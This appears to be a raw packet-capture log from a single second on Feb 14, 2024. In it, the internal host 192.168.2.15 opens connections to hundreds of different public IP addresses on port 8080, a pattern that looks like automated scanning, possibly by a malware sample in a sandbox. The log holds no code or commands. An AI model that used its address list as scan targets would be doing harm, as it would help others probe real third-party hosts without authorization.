Feb 14, 2024 09:28:47.394874096 CET	6752	8080	192.168.2.15	85.245.105.95
Feb 14, 2024 09:28:47.394874096 CET	6752	8080	192.168.2.15	94.222.118.48
Feb 14, 2024 09:28:47.394874096 CET	6752	8080	192.168.2.15	94.241.190.121
Feb 14, 2024 09:28:47.394881964 CET	6752	8080	192.168.2.15	62.124.59.124
Feb 14, 2024 09:28:47.394881964 CET	6752	8080	192.168.2.15	31.49.117.193
Feb 14, 2024 09:28:47.394897938 CET	6752	8080	192.168.2.15	31.185.9.28
Feb 14, 2024 09:28:47.394897938 CET	6752	8080	192.168.2.15	94.210.201.125
Feb 14, 2024 09:28:47.394897938 CET	6752	8080	192.168.2.15	85.246.22.110
Feb 14, 2024 09:28:47.394901037 CET	6752	8080	192.168.2.15	85.165.144.187
Feb 14, 2024 09:28:47.394915104 CET	6752	8080	192.168.2.15	85.190.222.209
Feb 14, 2024 09:28:47.394917011 CET	6752	8080	192.168.2.15	85.202.42.57
Feb 14, 2024 09:28:47.394925117 CET	6752	8080	192.168.2.15	94.7.172.59
Feb 14, 2024 09:28:47.394928932 CET	6752	8080	192.168.2.15	94.240.106.72
Feb 14, 2024 09:28:47.394947052 CET	6752	8080	192.168.2.15	95.99.254.124
Feb 14, 2024 09:28:47.394957066 CET	6752	8080	192.168.2.15	31.26.209.100
Feb 14, 2024 09:28:47.394963026 CET	6752	8080	192.168.2.15	94.14.234.225
Feb 14, 2024 09:28:47.394967079 CET	6752	8080	192.168.2.15	85.159.209.166
Feb 14, 2024 09:28:47.394969940 CET	6752	8080	192.168.2.15	85.39.115.36
Feb 14, 2024 09:28:47.394985914 CET	6752	8080	192.168.2.15	85.186.8.173
Feb 14, 2024 09:28:47.394992113 CET	6752	8080	192.168.2.15	95.7.59.71
Feb 14, 2024 09:28:47.394994020 CET	6752	8080	192.168.2.15	85.85.188.95
Feb 14, 2024 09:28:47.395004988 CET	6752	8080	192.168.2.15	94.5.75.180
Feb 14, 2024 09:28:47.395004988 CET	6752	8080	192.168.2.15	94.183.215.220
Feb 14, 2024 09:28:47.395009041 CET	6752	8080	192.168.2.15	95.8.122.132
Feb 14, 2024 09:28:47.395024061 CET	6752	8080	192.168.2.15	31.121.92.221
Feb 14, 2024 09:28:47.395025969 CET	6752	8080	192.168.2.15	31.49.156.126
Feb 14, 2024 09:28:47.395041943 CET	6752	8080	192.168.2.15	94.106.60.103
Feb 14, 2024 09:28:47.395044088 CET	6752	8080	192.168.2.15	62.25.77.117
Feb 14, 2024 09:28:47.395056009 CET	6752	8080	192.168.2.15	31.34.60.28
Feb 14, 2024 09:28:47.395060062 CET	6752	8080	192.168.2.15	62.39.114.252
Feb 14, 2024 09:28:47.395075083 CET	6752	8080	192.168.2.15	95.230.117.40
Feb 14, 2024 09:28:47.395075083 CET	6752	8080	192.168.2.15	62.77.244.54
Feb 14, 2024 09:28:47.395091057 CET	6752	8080	192.168.2.15	94.198.154.110
Feb 14, 2024 09:28:47.395093918 CET	6752	8080	192.168.2.15	95.152.157.133
Feb 14, 2024 09:28:47.395093918 CET	6752	8080	192.168.2.15	31.179.30.31
Feb 14, 2024 09:28:47.395107985 CET	6752	8080	192.168.2.15	31.228.180.217
Feb 14, 2024 09:28:47.395109892 CET	6752	8080	192.168.2.15	31.182.149.13
Feb 14, 2024 09:28:47.395123005 CET	6752	8080	192.168.2.15	62.125.235.2
Feb 14, 2024 09:28:47.395129919 CET	6752	8080	192.168.2.15	85.63.6.161
Feb 14, 2024 09:28:47.395133972 CET	6752	8080	192.168.2.15	62.92.122.175
Feb 14, 2024 09:28:47.395142078 CET	6752	8080	192.168.2.15	62.73.156.207
Feb 14, 2024 09:28:47.395153999 CET	6752	8080	192.168.2.15	95.67.221.51
Feb 14, 2024 09:28:47.395159006 CET	6752	8080	192.168.2.15	62.118.26.106
Feb 14, 2024 09:28:47.395159006 CET	6752	8080	192.168.2.15	95.125.162.209
Feb 14, 2024 09:28:47.395172119 CET	6752	8080	192.168.2.15	95.12.23.35
Feb 14, 2024 09:28:47.395175934 CET	6752	8080	192.168.2.15	62.36.76.40
Feb 14, 2024 09:28:47.395184994 CET	6752	8080	192.168.2.15	95.210.219.186
Feb 14, 2024 09:28:47.395190954 CET	6752	8080	192.168.2.15	62.49.193.24
Feb 14, 2024 09:28:47.395200968 CET	6752	8080	192.168.2.15	94.78.84.87
Feb 14, 2024 09:28:47.395204067 CET	6752	8080	192.168.2.15	31.69.224.38
Feb 14, 2024 09:28:47.395207882 CET	6752	8080	192.168.2.15	95.108.173.246
Feb 14, 2024 09:28:47.395219088 CET	6752	8080	192.168.2.15	31.41.22.198
Feb 14, 2024 09:28:47.395236015 CET	6752	8080	192.168.2.15	31.192.168.175
Feb 14, 2024 09:28:47.395236015 CET	6752	8080	192.168.2.15	62.253.140.241
Feb 14, 2024 09:28:47.395246983 CET	6752	8080	192.168.2.15	94.135.125.219
Feb 14, 2024 09:28:47.395258904 CET	6752	8080	192.168.2.15	62.34.151.206
Feb 14, 2024 09:28:47.395265102 CET	6752	8080	192.168.2.15	94.26.103.30
Feb 14, 2024 09:28:47.395268917 CET	6752	8080	192.168.2.15	95.120.192.15
Feb 14, 2024 09:28:47.395270109 CET	6752	8080	192.168.2.15	31.22.216.181
Feb 14, 2024 09:28:47.395276070 CET	6752	8080	192.168.2.15	31.140.26.95
Feb 14, 2024 09:28:47.395284891 CET	6752	8080	192.168.2.15	95.133.67.51
Feb 14, 2024 09:28:47.395291090 CET	6752	8080	192.168.2.15	95.182.80.127
Feb 14, 2024 09:28:47.395294905 CET	6752	8080	192.168.2.15	31.28.121.51
Feb 14, 2024 09:28:47.395297050 CET	6752	8080	192.168.2.15	31.52.156.43
Feb 14, 2024 09:28:47.395298958 CET	6752	8080	192.168.2.15	85.27.73.238
Feb 14, 2024 09:28:47.395303011 CET	6752	8080	192.168.2.15	95.56.119.152
Feb 14, 2024 09:28:47.395315886 CET	6752	8080	192.168.2.15	95.201.223.149
Feb 14, 2024 09:28:47.395332098 CET	6752	8080	192.168.2.15	94.145.250.171
Feb 14, 2024 09:28:47.395334005 CET	6752	8080	192.168.2.15	31.104.247.103
Feb 14, 2024 09:28:47.395334959 CET	6752	8080	192.168.2.15	95.52.14.109
Feb 14, 2024 09:28:47.395338058 CET	6752	8080	192.168.2.15	31.146.143.184
Feb 14, 2024 09:28:47.395339966 CET	6752	8080	192.168.2.15	95.147.227.90
Feb 14, 2024 09:28:47.395359039 CET	6752	8080	192.168.2.15	31.81.220.93
Feb 14, 2024 09:28:47.395359993 CET	6752	8080	192.168.2.15	31.208.175.157
Feb 14, 2024 09:28:47.395363092 CET	6752	8080	192.168.2.15	95.48.206.15
Feb 14, 2024 09:28:47.395364046 CET	6752	8080	192.168.2.15	94.222.183.78
Feb 14, 2024 09:28:47.395379066 CET	6752	8080	192.168.2.15	95.39.42.106
Feb 14, 2024 09:28:47.395381927 CET	6752	8080	192.168.2.15	85.68.149.73
Feb 14, 2024 09:28:47.395396948 CET	6752	8080	192.168.2.15	94.73.253.144
Feb 14, 2024 09:28:47.395397902 CET	6752	8080	192.168.2.15	62.49.197.174
Feb 14, 2024 09:28:47.395401955 CET	6752	8080	192.168.2.15	95.119.100.242
Feb 14, 2024 09:28:47.395402908 CET	6752	8080	192.168.2.15	62.153.61.1
Feb 14, 2024 09:28:47.395421028 CET	6752	8080	192.168.2.15	94.84.161.78
Feb 14, 2024 09:28:47.395421028 CET	6752	8080	192.168.2.15	94.245.91.230
Feb 14, 2024 09:28:47.395422935 CET	6752	8080	192.168.2.15	31.156.237.46
Feb 14, 2024 09:28:47.395423889 CET	6752	8080	192.168.2.15	31.118.210.30
Feb 14, 2024 09:28:47.395442009 CET	6752	8080	192.168.2.15	94.66.156.135
Feb 14, 2024 09:28:47.395445108 CET	6752	8080	192.168.2.15	62.183.225.152
Feb 14, 2024 09:28:47.395445108 CET	6752	8080	192.168.2.15	62.107.25.106
Feb 14, 2024 09:28:47.395447969 CET	6752	8080	192.168.2.15	31.191.26.177
Feb 14, 2024 09:28:47.395447969 CET	6752	8080	192.168.2.15	94.253.128.179
Feb 14, 2024 09:28:47.395467043 CET	6752	8080	192.168.2.15	95.167.243.248
Feb 14, 2024 09:28:47.395468950 CET	6752	8080	192.168.2.15	95.116.213.242
Feb 14, 2024 09:28:47.395473003 CET	6752	8080	192.168.2.15	85.240.223.77
Feb 14, 2024 09:28:47.395487070 CET	6752	8080	192.168.2.15	95.72.79.44
Feb 14, 2024 09:28:47.395488024 CET	6752	8080	192.168.2.15	85.191.186.27
Feb 14, 2024 09:28:47.395493031 CET	6752	8080	192.168.2.15	85.180.31.180
Feb 14, 2024 09:28:47.395499945 CET	6752	8080	192.168.2.15	31.59.59.243
Feb 14, 2024 09:28:47.395513058 CET	6752	8080	192.168.2.15	94.233.71.18
Feb 14, 2024 09:28:47.395513058 CET	6752	8080	192.168.2.15	62.220.51.223
Feb 14, 2024 09:28:47.395528078 CET	6752	8080	192.168.2.15	62.138.181.3
Feb 14, 2024 09:28:47.395529032 CET	6752	8080	192.168.2.15	94.43.59.146
Feb 14, 2024 09:28:47.395534992 CET	6752	8080	192.168.2.15	62.17.137.160
Feb 14, 2024 09:28:47.395545959 CET	6752	8080	192.168.2.15	31.224.210.254
Feb 14, 2024 09:28:47.395546913 CET	6752	8080	192.168.2.15	95.33.149.3
Feb 14, 2024 09:28:47.395558119 CET	6752	8080	192.168.2.15	94.25.72.157
Feb 14, 2024 09:28:47.395565987 CET	6752	8080	192.168.2.15	95.209.23.49
Feb 14, 2024 09:28:47.395572901 CET	6752	8080	192.168.2.15	94.206.97.11
Feb 14, 2024 09:28:47.395572901 CET	6752	8080	192.168.2.15	62.7.229.144
Feb 14, 2024 09:28:47.395589113 CET	6752	8080	192.168.2.15	62.18.215.130
Feb 14, 2024 09:28:47.395589113 CET	6752	8080	192.168.2.15	62.81.35.150
Feb 14, 2024 09:28:47.395593882 CET	6752	8080	192.168.2.15	95.81.237.52
Feb 14, 2024 09:28:47.395610094 CET	6752	8080	192.168.2.15	31.114.96.190
Feb 14, 2024 09:28:47.395615101 CET	6752	8080	192.168.2.15	95.202.235.72
Feb 14, 2024 09:28:47.395626068 CET	6752	8080	192.168.2.15	94.9.95.202
Feb 14, 2024 09:28:47.395629883 CET	6752	8080	192.168.2.15	85.213.87.98
Feb 14, 2024 09:28:47.395634890 CET	6752	8080	192.168.2.15	85.107.133.221
Feb 14, 2024 09:28:47.395634890 CET	6752	8080	192.168.2.15	95.244.175.171
Feb 14, 2024 09:28:47.395642042 CET	6752	8080	192.168.2.15	62.194.19.246
Feb 14, 2024 09:28:47.395663977 CET	6752	8080	192.168.2.15	94.45.183.150
Feb 14, 2024 09:28:47.395663023 CET	6752	8080	192.168.2.15	95.185.98.24
Feb 14, 2024 09:28:47.395663023 CET	6752	8080	192.168.2.15	62.255.48.141
Feb 14, 2024 09:28:47.395667076 CET	6752	8080	192.168.2.15	95.59.41.174
Feb 14, 2024 09:28:47.395683050 CET	6752	8080	192.168.2.15	94.222.197.0
Feb 14, 2024 09:28:47.395684958 CET	6752	8080	192.168.2.15	31.228.227.101
Feb 14, 2024 09:28:47.395699024 CET	6752	8080	192.168.2.15	85.65.81.225
Feb 14, 2024 09:28:47.395699978 CET	6752	8080	192.168.2.15	94.22.122.65
Feb 14, 2024 09:28:47.395705938 CET	6752	8080	192.168.2.15	31.184.97.151
Feb 14, 2024 09:28:47.395720005 CET	6752	8080	192.168.2.15	62.232.111.13
Feb 14, 2024 09:28:47.395737886 CET	6752	8080	192.168.2.15	94.149.152.212
Feb 14, 2024 09:28:47.395737886 CET	6752	8080	192.168.2.15	94.239.240.142
Feb 14, 2024 09:28:47.395746946 CET	6752	8080	192.168.2.15	31.27.138.250
Feb 14, 2024 09:28:47.395756006 CET	6752	8080	192.168.2.15	95.188.200.125
Feb 14, 2024 09:28:47.395764112 CET	6752	8080	192.168.2.15	31.230.59.123
Feb 14, 2024 09:28:47.395772934 CET	6752	8080	192.168.2.15	31.106.51.97
Feb 14, 2024 09:28:47.395776987 CET	6752	8080	192.168.2.15	94.71.58.23
Feb 14, 2024 09:28:47.395780087 CET	6752	8080	192.168.2.15	31.214.170.129
Feb 14, 2024 09:28:47.395787954 CET	6752	8080	192.168.2.15	62.226.2.69
Feb 14, 2024 09:28:47.395798922 CET	6752	8080	192.168.2.15	95.31.153.89
Feb 14, 2024 09:28:47.395798922 CET	6752	8080	192.168.2.15	95.221.101.146
Feb 14, 2024 09:28:47.395812035 CET	6752	8080	192.168.2.15	62.34.78.230
Feb 14, 2024 09:28:47.395813942 CET	6752	8080	192.168.2.15	31.100.109.173
Feb 14, 2024 09:28:47.395818949 CET	6752	8080	192.168.2.15	95.18.181.157
Feb 14, 2024 09:28:47.395832062 CET	6752	8080	192.168.2.15	85.153.56.8
Feb 14, 2024 09:28:47.395832062 CET	6752	8080	192.168.2.15	62.113.174.55
Feb 14, 2024 09:28:47.395836115 CET	6752	8080	192.168.2.15	85.49.83.46
Feb 14, 2024 09:28:47.395848036 CET	6752	8080	192.168.2.15	94.160.8.139
Feb 14, 2024 09:28:47.395854950 CET	6752	8080	192.168.2.15	85.36.194.176
Feb 14, 2024 09:28:47.395869970 CET	6752	8080	192.168.2.15	95.138.236.150
Feb 14, 2024 09:28:47.395874023 CET	6752	8080	192.168.2.15	62.86.72.10
Feb 14, 2024 09:28:47.395883083 CET	6752	8080	192.168.2.15	31.19.40.229
Feb 14, 2024 09:28:47.395886898 CET	6752	8080	192.168.2.15	94.1.206.116
Feb 14, 2024 09:28:47.395903111 CET	6752	8080	192.168.2.15	95.192.224.219
Feb 14, 2024 09:28:47.395906925 CET	6752	8080	192.168.2.15	95.106.211.58
Feb 14, 2024 09:28:47.395909071 CET	6752	8080	192.168.2.15	94.239.168.26
Feb 14, 2024 09:28:47.395921946 CET	6752	8080	192.168.2.15	31.211.190.62
Feb 14, 2024 09:28:47.395926952 CET	6752	8080	192.168.2.15	31.170.246.42
Feb 14, 2024 09:28:47.395932913 CET	6752	8080	192.168.2.15	95.128.189.54
Feb 14, 2024 09:28:47.395944118 CET	6752	8080	192.168.2.15	85.111.219.39
Feb 14, 2024 09:28:47.395957947 CET	6752	8080	192.168.2.15	62.226.35.255
Feb 14, 2024 09:28:47.395957947 CET	6752	8080	192.168.2.15	94.58.189.85
Feb 14, 2024 09:28:47.395958900 CET	6752	8080	192.168.2.15	94.8.98.144
Feb 14, 2024 09:28:47.395957947 CET	6752	8080	192.168.2.15	95.16.171.12
Feb 14, 2024 09:28:47.395961046 CET	6752	8080	192.168.2.15	94.248.239.84
Feb 14, 2024 09:28:47.395962000 CET	6752	8080	192.168.2.15	85.71.29.128
Feb 14, 2024 09:28:47.395966053 CET	6752	8080	192.168.2.15	95.104.204.142
Feb 14, 2024 09:28:47.395984888 CET	6752	8080	192.168.2.15	85.114.46.181
Feb 14, 2024 09:28:47.395984888 CET	6752	8080	192.168.2.15	62.168.109.15
Feb 14, 2024 09:28:47.395984888 CET	6752	8080	192.168.2.15	85.11.189.223
Feb 14, 2024 09:28:47.395986080 CET	6752	8080	192.168.2.15	62.18.254.29
Feb 14, 2024 09:28:47.396001101 CET	6752	8080	192.168.2.15	62.132.175.219
Feb 14, 2024 09:28:47.396009922 CET	6752	8080	192.168.2.15	31.214.196.185
Feb 14, 2024 09:28:47.396013975 CET	6752	8080	192.168.2.15	94.14.200.60
Feb 14, 2024 09:28:47.396014929 CET	6752	8080	192.168.2.15	94.255.13.45
Feb 14, 2024 09:28:47.396015882 CET	6752	8080	192.168.2.15	62.51.93.75
Feb 14, 2024 09:28:47.396027088 CET	6752	8080	192.168.2.15	62.90.53.12
Feb 14, 2024 09:28:47.396034002 CET	6752	8080	192.168.2.15	95.148.38.193
Feb 14, 2024 09:28:47.396043062 CET	6752	8080	192.168.2.15	62.11.74.38
Feb 14, 2024 09:28:47.396047115 CET	6752	8080	192.168.2.15	62.154.98.176
Feb 14, 2024 09:28:47.396063089 CET	6752	8080	192.168.2.15	95.212.160.18
Feb 14, 2024 09:28:47.396070957 CET	6752	8080	192.168.2.15	31.166.49.7
Feb 14, 2024 09:28:47.396075964 CET	6752	8080	192.168.2.15	94.143.183.49
Feb 14, 2024 09:28:47.396084070 CET	6752	8080	192.168.2.15	95.113.36.141
Feb 14, 2024 09:28:47.396092892 CET	6752	8080	192.168.2.15	31.63.61.201
Feb 14, 2024 09:28:47.396096945 CET	6752	8080	192.168.2.15	95.149.91.53
Feb 14, 2024 09:28:47.396106005 CET	6752	8080	192.168.2.15	94.66.146.232
Feb 14, 2024 09:28:47.396111965 CET	6752	8080	192.168.2.15	94.58.241.191
Feb 14, 2024 09:28:47.396115065 CET	6752	8080	192.168.2.15	62.164.179.14
Feb 14, 2024 09:28:47.396136999 CET	6752	8080	192.168.2.15	95.33.242.80
Feb 14, 2024 09:28:47.396137953 CET	6752	8080	192.168.2.15	62.37.119.3
Feb 14, 2024 09:28:47.396137953 CET	6752	8080	192.168.2.15	62.88.62.99
Feb 14, 2024 09:28:47.396142960 CET	6752	8080	192.168.2.15	31.27.193.239
Feb 14, 2024 09:28:47.396145105 CET	6752	8080	192.168.2.15	95.36.251.75
Feb 14, 2024 09:28:47.396159887 CET	6752	8080	192.168.2.15	85.28.56.79
Feb 14, 2024 09:28:47.396161079 CET	6752	8080	192.168.2.15	31.84.0.200
Feb 14, 2024 09:28:47.396172047 CET	6752	8080	192.168.2.15	31.236.231.208
Feb 14, 2024 09:28:47.396181107 CET	6752	8080	192.168.2.15	31.14.23.60
Feb 14, 2024 09:28:47.396187067 CET	6752	8080	192.168.2.15	95.14.216.162
Feb 14, 2024 09:28:47.396188021 CET	6752	8080	192.168.2.15	31.151.233.119
Feb 14, 2024 09:28:47.396192074 CET	6752	8080	192.168.2.15	95.176.237.141
Feb 14, 2024 09:28:47.396194935 CET	6752	8080	192.168.2.15	95.116.251.52
Feb 14, 2024 09:28:47.396194935 CET	6752	8080	192.168.2.15	31.68.133.137
Feb 14, 2024 09:28:47.396204948 CET	6752	8080	192.168.2.15	95.107.61.3
Feb 14, 2024 09:28:47.396214008 CET	6752	8080	192.168.2.15	85.8.165.212
Feb 14, 2024 09:28:47.396222115 CET	6752	8080	192.168.2.15	62.67.238.173
Feb 14, 2024 09:28:47.396226883 CET	6752	8080	192.168.2.15	85.90.129.57
Feb 14, 2024 09:28:47.396234989 CET	6752	8080	192.168.2.15	62.243.186.158
Feb 14, 2024 09:28:47.396249056 CET	6752	8080	192.168.2.15	94.131.173.58
Feb 14, 2024 09:28:47.396250010 CET	6752	8080	192.168.2.15	85.94.253.153
Feb 14, 2024 09:28:47.396249056 CET	6752	8080	192.168.2.15	85.159.188.120
Feb 14, 2024 09:28:47.396259069 CET	6752	8080	192.168.2.15	31.220.214.82
Feb 14, 2024 09:28:47.396262884 CET	6752	8080	192.168.2.15	94.28.105.21
Feb 14, 2024 09:28:47.396275043 CET	6752	8080	192.168.2.15	85.153.193.34
Feb 14, 2024 09:28:47.396280050 CET	6752	8080	192.168.2.15	31.226.39.53
Feb 14, 2024 09:28:47.396295071 CET	6752	8080	192.168.2.15	31.173.217.224
Feb 14, 2024 09:28:47.396295071 CET	6752	8080	192.168.2.15	94.94.26.34
Feb 14, 2024 09:28:47.396297932 CET	6752	8080	192.168.2.15	85.64.247.193
Feb 14, 2024 09:28:47.396323919 CET	6752	8080	192.168.2.15	94.10.98.74
Feb 14, 2024 09:28:47.396325111 CET	6752	8080	192.168.2.15	85.43.181.96
Feb 14, 2024 09:28:47.396327972 CET	6752	8080	192.168.2.15	62.239.163.50
Feb 14, 2024 09:28:47.396327972 CET	6752	8080	192.168.2.15	62.0.20.217
Feb 14, 2024 09:28:47.396328926 CET	6752	8080	192.168.2.15	94.49.92.24
Feb 14, 2024 09:28:47.396328926 CET	6752	8080	192.168.2.15	62.218.124.134
Feb 14, 2024 09:28:47.396328926 CET	6752	8080	192.168.2.15	85.151.237.59
Feb 14, 2024 09:28:47.396337032 CET	6752	8080	192.168.2.15	85.254.27.135
Feb 14, 2024 09:28:47.396348000 CET	6752	8080	192.168.2.15	94.88.160.184
Feb 14, 2024 09:28:47.396348000 CET	6752	8080	192.168.2.15	31.173.62.178
Feb 14, 2024 09:28:47.396348000 CET	6752	8080	192.168.2.15	31.132.134.251
Feb 14, 2024 09:28:47.396363020 CET	6752	8080	192.168.2.15	62.59.48.18
Feb 14, 2024 09:28:47.396363974 CET	6752	8080	192.168.2.15	31.192.130.103
Feb 14, 2024 09:28:47.396378994 CET	6752	8080	192.168.2.15	94.247.211.179
Feb 14, 2024 09:28:47.396383047 CET	6752	8080	192.168.2.15	94.229.192.19
Feb 14, 2024 09:28:47.396387100 CET	6752	8080	192.168.2.15	62.172.15.126
Feb 14, 2024 09:28:47.396387100 CET	6752	8080	192.168.2.15	62.64.99.159
Feb 14, 2024 09:28:47.396399975 CET	6752	8080	192.168.2.15	94.245.1.172
Feb 14, 2024 09:28:47.396403074 CET	6752	8080	192.168.2.15	31.127.173.104
Feb 14, 2024 09:28:47.396416903 CET	6752	8080	192.168.2.15	94.74.22.32
Feb 14, 2024 09:28:47.396425962 CET	6752	8080	192.168.2.15	95.30.115.177
Feb 14, 2024 09:28:47.396430969 CET	6752	8080	192.168.2.15	62.141.236.77
Feb 14, 2024 09:28:47.396430969 CET	6752	8080	192.168.2.15	31.230.178.243
Feb 14, 2024 09:28:47.396435022 CET	6752	8080	192.168.2.15	95.231.233.213
Feb 14, 2024 09:28:47.396447897 CET	6752	8080	192.168.2.15	94.110.241.150
Feb 14, 2024 09:28:47.396459103 CET	6752	8080	192.168.2.15	95.38.139.194
Feb 14, 2024 09:28:47.396464109 CET	6752	8080	192.168.2.15	62.110.120.21
Feb 14, 2024 09:28:47.396471977 CET	6752	8080	192.168.2.15	85.19.8.105
Feb 14, 2024 09:28:47.396481037 CET	6752	8080	192.168.2.15	31.129.93.149
Feb 14, 2024 09:28:47.396486044 CET	6752	8080	192.168.2.15	62.247.119.19
Feb 14, 2024 09:28:47.396486998 CET	6752	8080	192.168.2.15	62.35.249.30
Feb 14, 2024 09:28:47.396495104 CET	6752	8080	192.168.2.15	31.115.108.88
Feb 14, 2024 09:28:47.396508932 CET	6752	8080	192.168.2.15	85.125.64.106
Feb 14, 2024 09:28:47.396511078 CET	6752	8080	192.168.2.15	62.173.124.155
Feb 14, 2024 09:28:47.396512985 CET	6752	8080	192.168.2.15	95.52.147.56
Feb 14, 2024 09:28:47.396517038 CET	6752	8080	192.168.2.15	62.254.196.87
Feb 14, 2024 09:28:47.396524906 CET	6752	8080	192.168.2.15	85.95.95.25
Feb 14, 2024 09:28:47.396532059 CET	6752	8080	192.168.2.15	85.204.65.14
Feb 14, 2024 09:28:47.396532059 CET	6752	8080	192.168.2.15	62.22.62.156
Feb 14, 2024 09:28:47.396548033 CET	6752	8080	192.168.2.15	62.243.56.233
Feb 14, 2024 09:28:47.396550894 CET	6752	8080	192.168.2.15	62.106.69.47
Feb 14, 2024 09:28:47.396564007 CET	6752	8080	192.168.2.15	94.104.151.244
Feb 14, 2024 09:28:47.396564007 CET	6752	8080	192.168.2.15	62.172.177.182
Feb 14, 2024 09:28:47.396568060 CET	6752	8080	192.168.2.15	31.11.129.111
Feb 14, 2024 09:28:47.396569014 CET	6752	8080	192.168.2.15	31.27.217.253
Feb 14, 2024 09:28:47.396578074 CET	6752	8080	192.168.2.15	94.159.237.107
Feb 14, 2024 09:28:47.396584034 CET	6752	8080	192.168.2.15	31.162.141.58
Feb 14, 2024 09:28:47.396593094 CET	6752	8080	192.168.2.15	95.96.220.154
Feb 14, 2024 09:28:47.396601915 CET	6752	8080	192.168.2.15	94.232.115.10
Feb 14, 2024 09:28:47.396610975 CET	6752	8080	192.168.2.15	94.138.33.234
Feb 14, 2024 09:28:47.396615028 CET	6752	8080	192.168.2.15	62.163.228.226
Feb 14, 2024 09:28:47.396621943 CET	6752	8080	192.168.2.15	94.109.79.255
Feb 14, 2024 09:28:47.396632910 CET	6752	8080	192.168.2.15	95.46.187.154
Feb 14, 2024 09:28:47.396634102 CET	6752	8080	192.168.2.15	62.212.103.219
Feb 14, 2024 09:28:47.396636963 CET	6752	8080	192.168.2.15	31.41.123.68
Feb 14, 2024 09:28:47.396645069 CET	6752	8080	192.168.2.15	62.215.38.79
Feb 14, 2024 09:28:47.396656990 CET	80	33812	112.223.39.29	192.168.2.15
Feb 14, 2024 09:28:47.396661997 CET	6752	8080	192.168.2.15	85.45.196.97
Feb 14, 2024 09:28:47.396661997 CET	6752	8080	192.168.2.15	94.184.103.160
Feb 14, 2024 09:28:47.396672010 CET	6752	8080	192.168.2.15	31.12.2.182
Feb 14, 2024 09:28:47.396682978 CET	6752	8080	192.168.2.15	95.112.188.48
Feb 14, 2024 09:28:47.396702051 CET	6752	8080	192.168.2.15	85.33.69.152
Feb 14, 2024 09:28:47.396702051 CET	6752	8080	192.168.2.15	95.99.35.50
Feb 14, 2024 09:28:47.396704912 CET	6752	8080	192.168.2.15	94.211.13.130
Feb 14, 2024 09:28:47.396718979 CET	6752	8080	192.168.2.15	62.114.109.143
Feb 14, 2024 09:28:47.396720886 CET	6752	8080	192.168.2.15	95.239.237.222
Feb 14, 2024 09:28:47.396732092 CET	6752	8080	192.168.2.15	94.91.33.4
Feb 14, 2024 09:28:47.396738052 CET	6752	8080	192.168.2.15	31.34.41.8
Feb 14, 2024 09:28:47.396738052 CET	6752	8080	192.168.2.15	31.144.85.87
Feb 14, 2024 09:28:47.396740913 CET	6752	8080	192.168.2.15	31.104.136.240
Feb 14, 2024 09:28:47.396744967 CET	6752	8080	192.168.2.15	94.69.86.85
Feb 14, 2024 09:28:47.396744967 CET	6752	8080	192.168.2.15	85.33.26.97
Feb 14, 2024 09:28:47.396754026 CET	6752	8080	192.168.2.15	95.248.44.231
Feb 14, 2024 09:28:47.396766901 CET	6752	8080	192.168.2.15	94.120.77.171
Feb 14, 2024 09:28:47.396770954 CET	6752	8080	192.168.2.15	95.25.122.198
Feb 14, 2024 09:28:47.396780968 CET	6752	8080	192.168.2.15	62.108.99.97
Feb 14, 2024 09:28:47.396783113 CET	6752	8080	192.168.2.15	85.217.218.185
Feb 14, 2024 09:28:47.396790028 CET	6752	8080	192.168.2.15	95.207.158.203
Feb 14, 2024 09:28:47.396806955 CET	6752	8080	192.168.2.15	85.190.114.132
Feb 14, 2024 09:28:47.396806955 CET	6752	8080	192.168.2.15	94.76.66.229
Feb 14, 2024 09:28:47.396819115 CET	6752	8080	192.168.2.15	94.206.81.148
Feb 14, 2024 09:28:47.396827936 CET	6752	8080	192.168.2.15	62.100.34.230
Feb 14, 2024 09:28:47.396840096 CET	6752	8080	192.168.2.15	95.57.76.5
Feb 14, 2024 09:28:47.396846056 CET	6752	8080	192.168.2.15	62.98.132.77
Feb 14, 2024 09:28:47.396851063 CET	6752	8080	192.168.2.15	94.149.11.49
Feb 14, 2024 09:28:47.396859884 CET	6752	8080	192.168.2.15	85.202.195.209
Feb 14, 2024 09:28:47.396864891 CET	6752	8080	192.168.2.15	85.219.40.174
Feb 14, 2024 09:28:47.396866083 CET	6752	8080	192.168.2.15	31.172.50.152
Feb 14, 2024 09:28:47.396874905 CET	6752	8080	192.168.2.15	94.31.130.63
Feb 14, 2024 09:28:47.396883965 CET	6752	8080	192.168.2.15	94.173.170.10
Feb 14, 2024 09:28:47.396883965 CET	6752	8080	192.168.2.15	31.127.82.17
Feb 14, 2024 09:28:47.396883965 CET	6752	8080	192.168.2.15	95.185.141.243
Feb 14, 2024 09:28:47.396900892 CET	6752	8080	192.168.2.15	31.16.242.55
Feb 14, 2024 09:28:47.396900892 CET	6752	8080	192.168.2.15	62.135.174.105
Feb 14, 2024 09:28:47.396904945 CET	6752	8080	192.168.2.15	85.82.74.69
Feb 14, 2024 09:28:47.396914005 CET	6752	8080	192.168.2.15	85.204.160.245
Feb 14, 2024 09:28:47.396917105 CET	6752	8080	192.168.2.15	85.29.186.24
Feb 14, 2024 09:28:47.396917105 CET	6752	8080	192.168.2.15	95.193.141.98
Feb 14, 2024 09:28:47.396938086 CET	6752	8080	192.168.2.15	95.41.59.232
Feb 14, 2024 09:28:47.396939039 CET	6752	8080	192.168.2.15	94.151.32.226
Feb 14, 2024 09:28:47.396938086 CET	6752	8080	192.168.2.15	95.10.118.165
Feb 14, 2024 09:28:47.396956921 CET	6752	8080	192.168.2.15	95.35.160.189
Feb 14, 2024 09:28:47.396960020 CET	6752	8080	192.168.2.15	62.13.244.8
Feb 14, 2024 09:28:47.396965027 CET	6752	8080	192.168.2.15	31.0.3.141
Feb 14, 2024 09:28:47.396966934 CET	6752	8080	192.168.2.15	94.157.139.53
Feb 14, 2024 09:28:47.396980047 CET	6752	8080	192.168.2.15	62.153.58.163
Feb 14, 2024 09:28:47.396980047 CET	6752	8080	192.168.2.15	31.191.177.136
Feb 14, 2024 09:28:47.396986961 CET	6752	8080	192.168.2.15	62.15.220.27
Feb 14, 2024 09:28:47.396986961 CET	6752	8080	192.168.2.15	31.235.138.152
Feb 14, 2024 09:28:47.396989107 CET	80	33812	112.223.39.29	192.168.2.15
Feb 14, 2024 09:28:47.396991968 CET	6752	8080	192.168.2.15	95.58.88.104
Feb 14, 2024 09:28:47.397016048 CET	6752	8080	192.168.2.15	31.81.64.73
Feb 14, 2024 09:28:47.397036076 CET	33812	80	192.168.2.15	112.223.39.29
Feb 14, 2024 09:28:47.397044897 CET	6752	8080	192.168.2.15	31.114.166.122
Feb 14, 2024 09:28:47.397048950 CET	6752	8080	192.168.2.15	85.13.183.43
Feb 14, 2024 09:28:47.397064924 CET	6752	8080	192.168.2.15	94.53.153.207
